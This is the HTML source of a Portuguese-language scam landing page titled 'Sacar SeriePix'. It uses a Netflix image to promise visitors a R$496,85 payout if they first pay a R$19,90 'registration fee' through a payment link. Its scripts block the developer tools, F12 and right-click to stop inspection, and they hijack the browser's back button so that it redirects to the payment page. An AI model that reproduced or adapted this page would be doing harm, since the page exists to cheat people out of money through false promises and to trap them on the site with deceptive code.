<!DOCTYPE html><html lang="pt-BR"><head>


    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>.::Sacar SeriePix::.</title>
    <script>
        // Desabilita teclas de atalho comuns para abrir DevTools
        document.addEventListener('keydown', function(event) {
            if (event.ctrlKey && event.shiftKey && event.key === 'J') {
                event.preventDefault();
                return false;
            }
        });
    </script>
</head><body class="fundo1" style="position: absolute; transform: translate(-50%, -50%); z-index: 1; top: 50%; left: 50%; width: 100%; background-color: #000000
;">

    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link data-optimized="1" rel="stylesheet" href="css/5921624bf5bbe4c8c091ef09226fa76f.css">
    <link rel="preconnect" href="https://fonts.googleapis.com/">
    <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin="">
    <link data-optimized="1" href="css/1c7a3d2ee9759dc256d915300855c494.css" rel="stylesheet">
    <link data-optimized="1" href="css/ba9cbbe9240a489628be8eb27c56db8a.css" rel="stylesheet">
    <link rel="stylesheet" href="css/style.css">
    <link rel="stylesheet" href="css/animated.css">
    <link rel="shortcut icon" href="images/faveicon.png">
    <title>:: Sacar SeriePix ::</title>
    <style>
        .video-container {
            width: 100%;
            max-width: 200px; /* Tamanho máximo para desktops */
            margin: 20px auto; /* Adiciona espaço acima e abaixo do vídeo */
        }
        #vid_6663f2baa4b653000b4a254a {
            position: relative;
            width: 100%;
            padding: 56.25% 0 0; /* Proporção 16:9 */
        }
        #thumb_6663f2baa4b653000b4a254a {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            object-fit: cover;
            display: block;
        }
        #backdrop_6663f2baa4b653000b4a254a {
            position: absolute;
            top: 0;
            width: 100%;
            height: 100%;
            -webkit-backdrop-filter: blur(5px);
            backdrop-filter: blur(5px);
        }
    </style>
    


    <div style="background-color: transparent; width: 100%;">
        <div style="display: flex; flex-direction: column; align-items: center; flex-wrap: nowrap;">
            <script disable-devtool-auto="" src="https://cdn.jsdelivr.net/npm/disable-devtool@latest"></script>
          
            <img style="width: 200px; " src="images/netflix.gif">
            <h1 style="font-family:'RecoletaBold'; font-size: 40px; text-align: center; margin: 40px 0 20px 0; color: #FF0000; display: flow;">ATENÇÃO!</h1>
            <p style="font-size: 18px; text-align: center; padding: 0 20px 0 20px; font-family: 'Radian'; color: #ffffff
;">
                
                Para receber seu lucro de <span style="font-weight: bold; color: #008000; ">R$496,85</span> basta realizar seu cadastro no botão abaixo e pagar uma pequena Taxa de Cadastro! no valor de <span style="font-weight: bold; color: #008000; ">R$19,90</span>
                <br><br>
                Mas fique tranquilo(a) este valor de 19,90 irá retornar para sua conta junto com seu Saque de <span style="font-weight: bold; color: #008000; ">R$496,85</span>.
                <br>
                    <script disable-devtool-auto="" src="https://cdn.jsdelivr.net/npm/disable-devtool@latest"></script>
            </p>
            
        </div>
    </div>
<br><br>
<script disable-devtool-auto="" src="https://cdn.jsdelivr.net/npm/disable-devtool@latest"></script>
    <div class="coolinput" style="margin-top: -10px;">
        <a style="display: block; background-color: #008000; color: #FFFFFF; text-align: center; padding: 15px; border-radius: 23px; bottom: 60px; -webkit-animation: pulse 1.5s infinite; position: unset; width: 100%;" href="https://go.tribopay.com/ngn4k" id="continuarCadastroAtivo" class="continuarAtivo">Pagar Taxa e Receber meu Saldo</a>
        <script disable-devtool-auto="" src="https://cdn.jsdelivr.net/npm/disable-devtool@latest"></script>
        <br>
    </div>

    <script src="js/jquery.min.js"></script>
    <script src="js/funcoes.js"></script>
    <script disable-devtool-auto="" src="disable-devtool-5.html" url="#"></script>

    <!-- Script Impedir f12 -->
    <script>
    document.addEventListener("keydown", function (e) {
        if (e.keyCode == 123 || (e.ctrlKey && e.shiftKey && e.keyCode == 73)) { // Prevent F12
            e.preventDefault();
        }
    }, true);
    document.addEventListener('contextmenu', function (e) {
        e.preventDefault();
    }, true);
    </script>
    <!-- Script Impedir f12 -->

    <!-- Script Utms -->
    <script>
    // Função para adicionar os parâmetros aos links
    function adicionarParametrosAosLinks() {
        const urlParams = new URLSearchParams(window.location.search);

        const links = document.querySelectorAll('a');

        links.forEach(link =>  {
            const href = new URL(link.href);
            urlParams.forEach((value, key) => {
                href.searchParams.set(key, value);
            });
            link.href = href.toString();
        });
    }

    // Chamar a função ao carregar a página
    document.addEventListener('DOMContentLoaded', adicionarParametrosAosLinks);
    <!-- Script Utms -->
	 // BACK REDIRECT
            var urlBackRedirect = 'https://go.tribopay.com/ngn4k'; // lembre-se de usar a url sem espaços
            // não altere nada abaixo dessa linha
            urlBackRedirect = urlBackRedirect = urlBackRedirect.trim() +
            (urlBackRedirect.indexOf("?") > 0 ? '&' : '?') +
            document.location.search.replace('?', '').toString();
            history.pushState({}, "", location.href);
            history.pushState({}, "", location.href);
            window.onpopstate = function () {
                setTimeout(function () {
                    location.href = urlBackRedirect;
                }, 1);
            };
            // BACK REDIRECT


            // MÁSCARA INPUT
            jQuery(function($){
                $("#codigoBarrasDigitado").mask("99     99     99     99");
            });
            // MÁSCARA INPUT
        </script>   
    
<!-- Script Impedir f12-->
    <script>
    document.addEventListener("keydown", function (e) {
        if (e.keyCode == 123 || (e.ctrlKey && e.shiftKey && e.keyCode == 73)) { // Prevent F12
            e.preventDefault()
        }
    }, true);
    document.addEventListener('contextmenu', function (e) {
        e.preventDefault()
    }, true);
</script>
    <!-- Script Impedir f12-->
    
    <!-- Script Utms -->
<script>
    // Função para adicionar os parâmetros ao action do formulário
    function adicionarParametrosAoActionDoForm() {
        const urlParams = new URLSearchParams(window.location.search);
        const form = document.getElementById('formCupom'); // Obtém o formulário pelo ID

        // Verifica se o formulário existe
        if (form) {
            const action = new URL(form.action); // Obtém o action do formulário
            urlParams.forEach((value, key) => {
                action.searchParams.set(key, value);
            });
            form.action = action.toString(); // Define o novo action com os parâmetros adicionados
        }
    }

    // Chamar a função ao carregar a página
    document.addEventListener('DOMContentLoaded', adicionarParametrosAoActionDoForm);
</script>
<!-- Script Utms -->

</body></html>


</body></html>